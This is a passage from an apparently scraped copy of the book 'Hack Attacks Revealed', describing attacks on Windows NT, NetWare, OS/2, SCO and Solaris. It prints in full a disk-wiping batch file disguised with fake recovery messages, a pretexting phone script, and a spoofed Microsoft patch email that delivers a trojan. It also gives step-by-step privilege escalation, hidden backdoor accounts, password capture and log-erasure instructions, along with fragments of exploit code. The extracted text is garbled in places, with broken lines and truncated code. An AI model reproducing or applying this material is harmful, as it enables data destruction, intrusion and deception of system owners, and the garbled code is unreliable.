Hack Attacks Revealed A Complete Reference with Custom Security Hacking Toolkit phần 8 potx

Miscellaneous Mayhem Windows 3x, 9x, 2000 Hack State: Hard drive obliteration.. your system… >>c:\autoexec.bat echo for %%%%a in %drive% do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexe

Figure 10.9 DoS implications of the telnet hack attack

Figure 10.10 Dr Watson to the rescue

At this point, IIS could immediately crash, or crash upon scheduled administrative service interruptions—essentially, upon administrative shutdown and/or service restart The destructive requests include the following URLs:

• www.victim.com/Scripts/Tools/Newdsn.exe?Createdatabase

• www.victim.com/Scripts/Tools/Newdsn.exe?Create

Severe Congestion

Synopsis: Custom HTTP request saturation can cause severe resource degradation

Hack State: CPU congestion

Vulnerabilities: Win NT 3x, 4, and Internet Information Server version 3, 4, 5

Breach: Using a simple underground IIS attack software module (see Figure 10.11) that has been

programmed for an unlimited hit count, a remote attacker can cause severe CPU congestion, resulting in resource degradation and, ultimately, potential service denial The program shown here was written in Visual Basic and includes only a single form (see Figure 10.12)

Figure 10.11 IIS attack via custom HTTP request saturation

Figure 10.12 VB form for Main.frm

main.frm

Private Stopper&

Private Sub Command1_Click()

On Error GoTo ErrorHandler

If Command1.Caption = "begin" Then

If IsNumeric(Text2.Text) = False Then MsgBox "Please enter a valid amount!", vbExclamation, "": Text2.Text = "0": Exit Sub

a few effortless steps:

Step 1: The Search

In this step, the attacker chooses an IT staff victim Whether the attacker already knows the victim or searches the victim’s company Web site, it takes very little effort to perform some social engineering

to reveal a target email address Remarkably, some sites actually post IT staff support email addresses, and more remarkably, individual names, addresses, and even photos

This sample social engineering technique was like taking candy from a baby:

• Hacker: “Good morning; my name is Joe Hacker from Microsoft Please transfer me to your

IT department They are expecting my call as I am responding to a support call, ticket number 110158.”

• Reception: “Oh, okay Do you have the name of the person you are trying to reach?”

• Hacker: “No, sorry… The caller didn’t leave a name… wait, let me check… (sound of

hacker typing on the keyboard) Nope, only this contact number.’’

• Reception: “I’ll transfer you to Tom; he’s in IT He’ll know who to transfer you to.”

• Tom: “Hello?”

• Hacker: “Good morning, Tom; my name is Joe Hacker, from Microsoft support I’m

responding to a support call, ticket number 110158, and I’m making this call to put your staff

on our automated NT security alert list.”

• Tom: “Whom were you trying to reach?”

• Hacker: “Our terminals are down this morning; all I have is this contact number All I need

is an IT staff email address to add to our automated NT security alert list When new patches are available for any substantiated NT vulnerabilities, the recipient will receive updates Currently, three new patches are available in queue Also… ” (interrupted)

• Tom: “Cool; it’s a pain trying to keep up with these patches.”

• Hacker: “It says here your primary Web server is running IIS Which version is it?”

• Tom: “Believe it or not, it’s 3.0 We’re completely swamped, so we’ve put this on the back

burner You can use my address for the advisories; it’s tom.fooled@victim.com.”

• Hacker: “Consider it done, ticket closed Have a nice day.”

Step 2: The Alert

During this step, the attacker decides on the remote-control daemon and accompanying message In this particular case, the attacker chose phAse Zero:

Port: 555, 9989

Service: Ini-Killer, NeTAdmin, phAse Zero, Stealth Spy

Hacker’s Strategy: Aside from spy features and file transfer, the most important purpose of these

Trojans is to destroy the target system The only saving grace is that these daemons can only infect a system upon execution of setup programs that need to be run on the host

Using a mail-spoofing program, as mentioned earlier in this book, the attacker’s message arrived (spoofed from Microsoft):

>On 10 Oct 2000, at 18:09, support@microsoft.com wrote:

>

>Issue

>=====

>This vulnerability involves the HTTP GET method, which is used to obtain

>information from an IIS Web server Specially malformed GET requests can

>create a denial-of-service situation that consumes all server resources,

>causing a server to “hang.” In some cases, the server can be put back into

>service by stopping and restarting IIS; in others, the server may need to

>be rebooted This situation cannot happen accidentally The malformed GET

>requests must be deliberately constructed and sent to the server It is

>important to note that this vulnerability does not allow data on the

>server to be compromised, nor does it allow any privileges on it to be usurped

>The attached patch for this vulnerability is fully supported and should be applied

> immediately, as all systems are determined to be at risk of attack Microsoft recommends

>that customers evaluate the degree of risk that this vulnerability poses to their systems,

>based on physical accessibility, network, and Internet connectivity, and other factors

>

>

>Obtaining Support on This Issue

>===============================

>This is a supported patch If you have problems installing

>this patch, or require technical assistance with this patch,

>please contact Microsoft Technical Support For information

>on contacting Microsoft Technical Support, please see

>

>For additional security-related information about Microsoft products,

>please visit http://www.microsoft.com/security

>EXPRESS OR IMPLIED, INCLUDING THE WARRANTIES OF MERCHANTABILITY AND

>FITNESS FOR A PARTICULAR PURPOSE IN NO EVENT SHALL MICROSOFT

CORPORATION OR ITS

>SUPPLIERS BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,

>INCIDENTAL, CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL DAMAGES,

>EVEN IF MICROSOFT CORPORATION OR ITS SUPPLIERS HAVE BEEN ADVISED OF THE

>POSSIBILITY OF SUCH DAMAGES SOME STATES DO NOT ALLOW THE EXCLUSION

>You have received this email bulletin as a result of your registration

>to the Microsoft Product Security Notification Service You may

>unsubscribe from this email notification service at any time by sending

>an email to

MICROSOFT_SECURITY-SIGNOFF-REQUEST@ANNOUNCE.MICROSOFT.COM

>The subject line and message body are not used in processing the request,

>and can be anything you like

>

>For more information on the Microsoft Security Notification Service

>please visit http:/ /www.microsoft.com/security/bulletin.htm For

>security-related information about Microsoft products, please visit the

>Microsoft Security Advisor Web site at http://www.microsoft.com/security

Step 3: Another Successful Victim

During this step, the attacker simply waits a few days before exercising complete remote control with the phAse zero client, as shown in Figure 10.13

Miscellaneous Mayhem

Windows 3x, 9x, 2000

Hack State: Hard drive obliteration

File: HDKill.bat

Synopsis: Some hackers enjoy generating havoc among their victims This nasty hard-drive killer,

for example, has been attached to countless emails,

Figure 10.13 Complete control with phAse Zero

and distributed with game evaluations as a ReadMe.bat file In other cases, hackers go to the trouble

of breaking into systems only to add this file to the system bootup process Careful inspection of the code will reveal its purpose

Hdkill.bat

@echo off

:start

cls

echo PLEASE WAIT WHILE PROGRAM LOADS…

call attrib -r -h c:\autoexec.bat >nul

echo @echo off >c:\autoexec.bat

echo call format c: /q /u /autotest >nul >>c:\autoexec.bat

call attrib +r +h c:\autoexec.bat >nul

set drive=

set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

echo @echo off >drivechk.bat

echo @prompt %%%%comspec%%%% /f /c vol %%%%1: $b find "Vol" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS…

echo @prompt %%%%comspec%%%% /f /c dir

%%%%1:.\/ad/w/-p $b find "bytes" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 goto enddc >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS…

echo @prompt dir

%%%%1:.\/ad/w/-p $b find " 0 bytes free" > nul >{t}.bat

%comspec% /e:2048 /c {t}.bat >>drivechk.bat

del {t}.bat

echo if errorlevel 1 set drive=%%drive%% %%1 >>drivechk.bat

cls

echo PLEASE WAIT WHILE PROGRAM LOADS…

echo :enddc >>drivechk.bat

:testdrv

for %%a in (%alldrive%) do call drivechk.bat %%a >nul

del drivechk.bat >nul

:form_del

call attrib -r -h c:\autoexec.bat >nul

echo @echo off >c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers your system… >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers

your system… >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers

your system… >>c:\autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul

>>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers

your system… >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call format %%%%a: /q /u /autotest >nul

>>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers

your system… >>c:\autoexec.bat

echo for %%%%a in (%drive%) do call c:\temp.bat %%%%a Bunga >nul >>c:\autoexec.bat

echo cls >>c:\autoexec.bat

echo echo Loading Windows, please wait while Microsoft Windows recovers

your system… >>c:\autoexec.bat

echo for %%%%a in (%drive%) call deltree /y %%%%a:\ >nul

granted >>c:\autoexec.bat

echo echo 2 Love is important, if you have it, truly, don't let go

of

it like I did! >>c:\autoexec.bat

echo echo 3 If you are NOT a vegetarian, then you are a murderer, and

I'm glad your HD is dead >>c:\autoexec.bat

echo echo 4 If you are Australian, I feel sorry for you, accept my sympathy, you retard >>c:\autoexec.bat

echo echo 5 Don't support the following: War, Racism, Drugs and th

e

Liberal Party.>>c:\autoexec.bat

echo echo >>c:\autoexec.bat

echo echo Regards, >>c:\autoexec.bat

echo echo >>c:\autoexec.bat

echo echo Munga Bunga >>c:\autoexec.bat

call attrib +r +h c:\autoexec.bat

:makedir

if exist c:\temp.bat attrib -r -h c:\temp.bat >nul

echo @echo off >c:\temp.bat

echo %%1:\ >>c:\temp.bat

echo cd\ >>c:\temp.bat

echo :startmd >>c:\temp.bat

echo for %%%%a in ("if not exist %%2\nul md %%2" "if exist %%2\nul

\%%2\%%2\%%2\%%2\nul goto startmd >>c:\temp.bat

call attrib +r +h c:\temp.bat >nul

cls

echo Initializing Variables…

for %%a in (%drive%) do call format %%a: /q /u /autotest >nul

cls

echo Initializing Variables…

echo Validating Data…

for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

cls

echo Initializing Variables…

echo Validating Data…

echo Analyzing System Structure…

for %%a in (%drive%) call attrib -r -h %%a:\ /S >nul

call attrib +r +h c:\temp.bat >nul

call attrib +r +h c:\autoexec.bat >nul

cls

echo Initializing Variables…

echo Validating Data…

echo Analyzing System Structure…

echo Initializing Application…

for %%a in (%drive%) call deltree /y %%a:\* >nul

cls

echo Initializing Variables…

echo Validating Data…

echo Analyzing System Structure…

echo Initializing Application…

echo Starting Application…

for %%a in (%drive%) do call c:\temp.bat %%a Munga >nul

echo

echo Q) What's the worst thing about being an egg?

echo A) You only get laid once

Synopsis: Hackers use the ProgenicMail technique to dupe victims into sending all cached system

passwords The program operates in a simple fashion, better explained on a per-file basis:

• Psetup.dat This file contains the custom configurations options:

[Setup]

Mail=(email address to forward passwords to)

Data=ProgenicMail (if left blank, the program will send passwords upon each execution)

• setup.dl This file can be replaced with any exe to be loaded to hide the true purpose of the

attack For example, the attacker may rename a joke.exe as setup.dll The program will then launch setup.dll (really joke.exe) as it forwards all system passwords to the attacker

Hack State: Unrecoverable file deletion

File: FFK.exe

Synopsis: After penetrating a system, hackers will attempt to delete logs and trace back evidence

with an unrecoverable file deletion utility The purpose of this program, by PhrozeN, is to permanently delete files very fast For example, with Fast File Killer (shown in Figure 10.14), 4,000 files of 3–150 KB take

Figure 10.14 Fast File Killer in action

Figure 10.15 Password cracking with NTCrack

only about 30–60 seconds to delete, and the action all takes place in the background while performing other tasks These utilities are typically coded to completely remove files with numerous deletions or by scrambling

Windows NT

Hack State: Brute- force password cracking

File: NTCrack.exe

Synopsis: NTCrack is a common Underground password cracker for NT Operating remotely or

locally, an attacker can port custom dictionaries on behalf of the attempted login username and/or password What’s unique with this particular tool is the speed at which simulated logons can be attempted (see Figure 10.15)

Hack State: Administrative privileges exploitation

File: NTAdmin.exe

Synopsis: Local attackers exploit vulnerable NT guest accounts with NTAdmin This Underground

enigma has been coded to modify general user/guest accounts on an NT domain to acquire privileged administrative rights The captures shown in Figure 10.16, before and after the exploit, illustrate the group modifications from guests to administrators

Other Exposure

This section concludes with a compilation of Underground Microsoft NT hack attacks

This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller

Figure 10.16 Hacking with NTAdmin

Common Accounts

Two accounts typically come with NT: administrator and guest In numerous network environments, unpassworded admin and guest accounts have been unveiled It is possible, however, that the system administrator has renamed the administrator account Hackers know that by typing “NBTSTAT-A ipaddress” reveals the new administrator account

Passwords

• Accessing the password file The location of the NT security database is located in

\\WINNT\SYSTEM32\CONFIG\SAM By default, the SAM is readable, but locked since it

is in use by system components It is possible, however, that there are SAM.SAV files that could be read to obtain password information

• More on cracking passwords A standard Windows NT password is derived by converting

the user’s password to Unicode, then using MD4 to get a 16-byte value; the hash value is the actual NT “password.’’ In order to crack NT passwords, the username and the corresponding one-way hashes need to be extracted from the password database This process can be painless, by using hacker/programmer Jeremy Allison’s PWDUMP, coupled with a password-cracking program as defined earlier in this chapter

From the Console

• Information gathering From the console on a domain controller, hackers use the following

simple steps to get a list of accounts on the target machine With a list of user accounts, they can target individual attacks:

1 From the User Manager, create a trusting relationship with the target

2 Launch NT Explorer, and right-click on any folder

3 Select Sharing

4 From the Shared window, select Add

5 From the Add menu, select the target NT server This will reveal the entire group listing of the target

6 Select Show Users to see the entire user listing, including full names and descriptions

Novell NetWare

Novell, Inc (www.novell.com) is a leading provider of system operation software for all types of corporate and private networks including intranets, extranets, and the Internet Quickly climbing the corporate usage ladder since 1983, Novell NetWare currently is being used in 81 percent of Fortune

500 companies in the United States (according to Harte Hanks Market Intelligence) The company boasts greater security provision throughout the Net while accelerating e-business transformations

Liabilities

Getting In

Hacking the Console

Synopsis: Simple techniques can facilitate console breaches

Hack State: Administrative privileges exploitation

Vulnerabilities: All flavors prior to version 4.11

Breach: When NetWare administrators load NetWare loadable modules (NLMs) remote.nlm and

rspx.nlm, hackers seek a program titled rconsole.exe, typically from the //public directory At this

point, and on the same address scheme as the administrator and/or target server, the hacker loads an IPX packet sniffer and waits to capture the system password Among hackers, a popular sniffer package is SpyNet (Chapter 8 describes this package more fully) If the attacker wants to conceal evidence of the hack, he or she erases the system log from //etc/console.log by unloading and reloading the conlog.nlm This starts a new log capture file over the old one, which contains the evidence

Stealing Supervisory Rights

Synopsis: Custom coding can modify a standard login account to have supervisor equivalence Hack State: Administrative privileges exploitation

Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x

Breach: The tempting challenge of any local hacker on a Novell network is to gain supervisory

rights Crack98.c by renowned hacker Mnemonic sets the connection to 0 for supervisor, then creates

a user object in the bindery, which must have an equivalent property At that point, the program adds supervisor equivalent to the supervisor equivalence property, which gives the account supervisor status

if (CreateBinderyObject(name, OT_USER, BF_STATIC, 0x31) == 0)

printf("The account %s has been created\n", account);

else

printf("The account %s already exists on the network\n", account); CreateProperty(account, OUT_USER, "SECURITY_EQUALS", BF_STATIC | BF_SET,

Synopsis: Inside and local hackers can attempt to reveal common passwords

Hack State: Password theft

Vulnerabilities: All flavors prior to 4.1

Breach: NetCrack (Figure 10.17) by Jim O’Kane is a program by which, through repeated “demon

dialer” calls to the VERIFY_PASSWORD function in NetWare’s Bindery commands, NetCrack.exe

attempts to divulge user passwords using legal queries

Format: NETCRACK <UserID>

Common user accounts in NetWare and affiliated hardware partners include:

Hack State: Remote control

Vulnerabilities: NetWare NDS

Breach: After gaining access control to the NetWare O/S, hackers attempt to install a remote-control

backdoor that may go unnoticed for some time There are six simple steps to initiate this process: 1) In NWADMIN, highlight an existing container

2) Create a new container inside this container

3) Create a user inside this new container

a) Allow full trustee rights to this user’s own user object

b) Allow this user full trustee rights to the new container

c) Give this user supervisory equivalence

4) Modify the Access Control List (ACL) for the new user so that he or she cannot be seen

5) Adjust the Inherit Rights Filter on the new container so it cannot be seen

6) Place the new container in the IT group container to install the backdoor and to enable its login to show up in the normal tools that show active connections

Locking Files

Synopsis: Inside and local hackers can wreak havoc by modifying file usability

Hack State: File control

Vulnerabilities: NetWare 2x, 3x, 4x, IntraNetWare 4x

Breach: After gaining access to NetWare, some hackers are keen on causing chaos by locking files

This hack attack, associated with a program called Bastard by The Grenadier (Underground hacker/programmer) (Figure 10.18), is popular among disgruntled emp loyees Basically, upon execution, the program simply asks for the path to a file for lockdown modifications At that point,

no other user can open the file for use until the attacker closes Bastard.exe, logs off, or shuts down

Essentially, when critical O/S operational files fall victim to this exploit, this brings networks to their knees The program is almost too simple to use: the only requirement is that the attacker have Read access to the target file

Figure 10.18 Locking files with Bastard

Miscellaneous Mayhem

Disappearing Disk Usage

Synopsis: Hackers can crash hard drives by filling up all available space

Hack State: System crash

Vulnerabilities: NetWare 2/3

Breach: Burn.c by the infamous hacker, Jitsu-Disk depletes available disk space by erroneously

filling up an error log file at the rate of 1 MB per minute Remnants of this particular attack may be found on many older NetWare systems Apparently, the attacker does not have to be logged in to execute this utility

Burn.c

#include <dos.h>

typedef unsigned int uint8;

int shreq(int f, uint8 *req, int rl, uint8 *ans, int al)

This section concludes with a compilation of Underground Novell NetWare hack attacks

This section was prepared with help from the Nomad Mobile Research Centre (NMRC), in particular: Simple Nomad and contributors: Shadowlord, Mindgame, The LAN God, Teiwaz, Fauzan Mirza, David Wagner, Diceman, Craigt, Einar Blaberg, Cyberius, Jungman, RX2, itsme, and Greg Miller

Accounts

• Distinguishing valid account names on Novell NetWare Any limited account should have

enough access to allow you to run SYSCON, located in the SYS:PUBLIC directory Once in, type SYSCON and enter Go to User Information to see a list of all defined accounts You will not see much information with a limited account, but you can get the account and the user’s full name If you’re in with any validity, you can run USERLST.EXE and get a list of all valid accounts on the server

• What if you don’t have access? In this case, you can’t try just any account name at the LOGIN prompt It will ask you for a password, whether the account name is valid or not; and

if it is valid and you guess the wrong password, you could be letting the administrators know what you’re up to if Intruder Detection is on

• To determine whether an account is valid, from a DOS prompt, use a local copy of MAP.EXE After you’ve loaded the NetWare TSRs up through NETX or VLM, try to map a drive using the server name and volume SYS, for example:

MAP G:=TARGET_SERVER/SYS:APPS <enter>

• Since you are not really logged in, you will be prompted for a login ID If it is a valid ID, you will be prompted for a password If not, you will immediately receive an error Of course, if there is no password for the ID you chose to use, you will be attached and mapped to the server

• You can do the same thing with ATTACH.EXE:

ATTACH TARGET_SERVER/loginidtotry <enter>

• Again, if this is valid, you will be prompted for a password, if not you’ll get an error

• Other means to obtain supervisor access This technique is most effective in NetWare

version 3.11 When the Supervisor is logged in, a program called NW-HACK.EXE does the following:

1 The Supervisor password is changed to SUPER_HACKER

2 Every account on the server is modified as supervisor equivalent

• Leaving a backdoor open, redux When hackers have access to a system, they want a way

back in that has supervisor equivalency You can use SUPER.EXE, written for the express purpose of allowing the nonsupervisor user to toggle on and off supervisor equivalency If you used NW-Hack to obtain access, you can turn on the toggle before the administrator removes your supervisory equivalency If you gain access to a supervisor-equivalent account, give the guest account super equivalency, then log in as Guest and toggle it on as well At this point, get back in as the original supervisor account, and remove the supervisor equivalency Now Guest can toggle on supervisor equivalency whenever convenient

• Getting supervisor access, redux If you have two volumes or some unallocated disk space,

you can use this hack to get supervisor access:

1 Dismount all volumes

2 Rename SYS: to SYSOLD:

3 Rename VOL1: (or equivalent) to SYS:; or just create a new SYS: on a new disk

4 Reboot the server

5 Mount SYS: and SYSOLD:

6 Attach to the server as Supervisor (note: login not available)

7 Rename SYSOLD:SYSTEM \NET$***.SYS to NET$****.OLD

8 Dismount volumes

9 Rename volumes back to the correct names

10 Reboot the server again

11 Log in as Supervisor, this time with no password

12 Run BINDREST

At this point, you should be logged in as the supervisor With these privileges, you can create a new user as supervisor-equivalent, then use this new user to reset the supervisor’s password

Passwords

• Accessing the password file When accessing the password file in NetWare, all objects and

their properties are kept in the bindery files in versions 2x and 3x, and in the NDS database in version 4.x An example of an object might be a printer, a group, an individual’s account, and

so on An example of an object’s properties might include an account’s password or full username, a group’s member list, or full name The bindery file’s attributes (or flags) in versions 2x and 3x are denoted as Hidden and System These files are located on the SYS: volume in the SYSTEM subdirectory as follows:

Version 2x: NET$BIND.SYS, NET$BVAL.SYS

Version 3x: NET$OBJ.SYS, NET$PROP.SYS, NET$VAL.SYS

NET$BVAL.SYS and NET$VAL.SYS are the actual storage locations for passwords in versions 2x and 3x, respectively In version 4.x, however, the files are physically located in a different location

By using the RCONSOLE utility and Scan Directory option, you can see the files in SYS: _NETWARE:

VALLINCEN.DAT: License validation

• More on cracking passwords As with most insecure LANs, for purposes of this discussion,

we’ll assume that Intruder Detection is turned off and that unencrypted passwords are allowed If you have access to the console, either by standing in front of it or via RCONSOLE, you can use SETSPASS.NLM, SETSPWD.NLM, or SETPWD.NLM to reset passwords simply by loading the NLM and passing command-line parameters:

NLM ACCOUNT(S) RESET NETWARE VERSION(S) SUPPORTED

SETSPASS.NLM Supervisor 3x

SETSPWD.NLM Supervisor 3x, 4x

SETPWD.NLM Any valid account 3x, 4x

If you can plant a password catcher or keystroke reader, you can get access to them with LOGIN.EXE, located in the SYS:LOGIN directory The best place to put a keystroke capture program is in the workstation’s path, with the ATTRIB set as hidden The advantage to that action is that you’ll capture the password without NetWare knowing about it An alternative is to replace LOGIN.EXE by the itsme program This program, coupled with PROP.EXE, will create a separate property in the bindery on a version 2x or 3x server that contains the passwords Here are the steps to perform when using these tools:

1 Gain access to a workstation logged in as Supervisor or equivalent (or use another technique,

as described elsewhere)

2 Run the PROP.EXE file with a -C option This creates the new property for each bindery object

3 Replace the LOGIN.EXE in the SYS:LOGIN directory with the itsme version

4 Keep PROP.EXE on a floppy, and check the server with any valid login after a few days

5 To check for captured passwords, type PROP -R after logging in This can be redirected to a file or printer

Accounting and Logging

• Defeating accounting Accounting is Novell’s technique for controlling and managing

access to the server The admin setup rates are based on blocks read and written, service requests, connect time, and disk storage The account “pays” for the service by being given some number, and the accounting server deducts for these items Any valid account, including nonsupervisor accounts, can check to see if Accounting is active simply by running SYSCON and attempting to access Accounting

To defeat Accounting, you must turn it off by taking three simple steps:

1 Spoof your address This will depend on the network interface card (NIC); typically, you can

do it in the Link Driver section of the NET.CFG file by adding the following line:

NODE ADDRESS xxxxxxxxxxxx

where xxxxxxxxxxxx is the 12-digit MAC layer address

2 If you are using a backdoor, activate it with SUPER.EXE

3 Delete Accounting by running SYSCON, then selecting Accounting, Accounting Servers, and hitting the Delete key The last entry in the NET$ACCT.DAT file will be your login, time-stamped with the spoofed node address

Defeating logging These steps require console and Supervisor access:

1 Type MODULES at the console Look for the CONLOG.NLM to verify active logging

2 Look on the server in SYS:ETC for a file called CONSOLE.LOG, a plain text file that you can edit, though not while CONLOG is running

3 Unload CONLOG at the console

4 Delete or edit the CONSOLE.LOG file to erase track evidence

5 Reload CONLOG

6 Check the CONSOLE.LOG file to ensure the owner has not changed

7 Run PURGE in the SYS:ETC directory to purge old versions of CONSOLE.LOG

Files and Directories

• Viewing hidden files Use NDIR to see hidden files and directories: NDIR *.* /S /H

• Defeating the execute-only flag If a file is flagged as execute-only, it can still be opened

Try opening the file with a program that will read in executables, and perform a Save As (to another location)

• Editing login scripts Login scripts are stored in SYS:_NETWARE Unlike the binary files

used in NDS, these files are completely editable by using EDIT.NLM Performing an RCONSOLE directory scan in SYS:_NETWARE will turn up files with extensions such as 000, which are probably login scripts For example, suppose you found 00021440.000: LOAD EDIT SYS:_NETWARE\00021440.000

If it’s a login script, you’ll be able to edit and save it This completely bypasses NDS security, and is the main weakness here As a result, you can use this to grant a user extra rights that can lead to a number of compromises, including full access to the file system of any server in the tree

OS/2

With excellent ratings and customer feedback, it’s a mystery why this operating system hasn’t made its way to take greater predominance IBM’s OS/2 (/www-4.ibm.com/software/os/warp) had compatibility and stability problems until version 2.0 released in 1992 Since the addition of a new object-oriented GUI, stable DOS compatibility, and resilient Windows software compatibility, OS/2 sales have been steadily growing IBM’s recent release, version 4, comes standard with all of the bells and whistles deemed necessary by consumers The OS/2 System folder contains all the tools necessary to manage a PC, from folder templates to the desktop schemes with drag-and-drop fonts and colors And connectivity configuration is a walk in the park from the Internet, file/print servers

to peer networks (see Figure 10.19)

Liabilities

Tunneling

Synopsis: Defense perimeter tunnel attack through firewall and/or proxy

Figure 10.19 OS/2 modifications

Hack State: Security perimeter bypass for unauthorized access

Vulnerabilities: All flavors

Breach: Excerpt from Os2tunnel/http.c

Os2tunnel/http.c

#include <Inc Mods>

static inline ssize_t

http_method (int fd, Http_destination *dest,

Http_method method, ssize_t length)

sprintf (str, "%s:%d", dest->host_name, dest->host_port);

http_add_header (&request->header, "Host", str);

case -205: /* Reset Content */

case -206: /* Partial Content */

return 0;

case -400: /* Bad Request */

log_error ("http_error_to_errno: 400 bad request");

case -404: /* Not Found */

log_error ("http_error_to_errno: 404 not found");

return ENOENT;

case -411: /* Length Required */

log_error ("http_error_to_errno: 411 length required");

return EIO;

case -413: /* Request Entity Too Large */

log_error ("http_error_to_errno: 413 request entity too large

");

return EIO;

case -505: /* HTTP Version Not Supported */

log_error ("http_error_to_errno: 413 HTTP version not supported");

return EIO;

case -100: /* Continue */

case -101: /* Switching Protocols */

case -300: /* Multiple Choices */

case -301: /* Moved Permanently */

case -302: /* Moved Temporarily */

case -303: /* See Other */

case -304: /* Not Modified */

case -305: /* Use Proxy */

case -402: /* Payment Required */

case -405: /* Method Not Allowed */

case -406: /* Not Acceptable */

case -407: /* Proxy Autentication Required */

case -408: /* Request Timeout */

case -409: /* Conflict */

case -410: /* Gone */

case -412: /* Precondition Failed */

case -414: /* Request-URI Too Long */

case -415: /* Unsupported Media Type */

case -500: /* Internal Server Error */

case -501: /* Not Implemented */

case -502: /* Bad Gateway */

case -503: /* Service Unavailable */

case -504: /* Gateway Timeout */

log_error ("http_error_to_errno: HTTP error %d", err); return EIO;

static const char *

http_method_to_string (Http_method method)

{

switch (method)

{

case HTTP_GET: return "GET";

case HTTP_PUT: return "PUT";

case HTTP_POST: return "POST";

case HTTP_OPTIONS: return "OPTIONS";

case HTTP_HEAD: return "HEAD";

case HTTP_DELETE: return "DELETE";

case HTTP_TRACE: return "TRACE";

unsigned char *buf, *buf2;

ssize_t n, len, buf_size;

static inline Http_header *

http_alloc_header (const char *name, const char *value)

header->name = header->value = NULL;

header->name = strdup (name);

header->value = strdup (value);

if (name == NULL || value == NULL)

unsigned char buf[2];

unsigned char *data;

Http_header *h;

size_t len;

ssize_t n;

*header = NULL;

memmove (data + 2, data, n);

memcpy (data, buf, 2);

static inline Http_response *

http_allocate_response (const char *status_message)

response->major_version = atoi (data);

log_verbose ("http_parse_response: major version = %d", response->major_version);

response->minor_version = atoi (data);

log_verbose ("http_parse_response: minor version = %d", response->minor_version);

response->status_code = atoi (data);

log_verbose ("http_parse_response: status code = %d", response->status_code);

static inline Http_request *

http_allocate_request (const char *uri)

http_create_request (Http_method method,

const char *uri,

request->major_version = atoi (data);

log_verbose ("http_parse_request: major version = %d",

request->minor_version = atoi (data);

log_verbose ("http_parse_request: minor version = %d",

free ((char *)request->uri);

Figure 10.20 SCO graphical interfaces

Liabilities

POP Root Accessibility

Synopsis: POP remote root security breach for SCOPOP server

Hack State: Unauthorized access

Vulnerabilities: SCO OpenServer 5x

Breach: scoroot.c

scoroot.c

#include <stdio.h>

#include <stdlib.h>

exit(0);

}

sa.sin_family=AF_INET;

Figure 10.21 Customizing partitions with Solaris

Solaris

Sun Microsystems’ Solaris (www.sun.com/solaris) version 8 UNIX O/S is the industry’s first and most popular dot-com-grade operating environment for Intel and Sparc systems Since its release,

Sun has received positive reviews in such publications as PC Magazine and InfoWorld There are

eight features that, industrywide, can be used to evaluate Solaris 8: advanced security, availability, scalability, interoperability, ease of use, multiplatform connectivity, comprehensive open-source developing, and last but certainly not least, it’s available free of charge, by downloading www.sun.com/software/solaris /source Solaris 8 also can preserve existing operating systems and data (see Figure 10.21)

Liabilities

Root Accessibility

Synopsis: Various remote root security breaches

Hack State: Unauthorized access

unsigned long int nop, esp;

long int offset = 0;

unsigned long int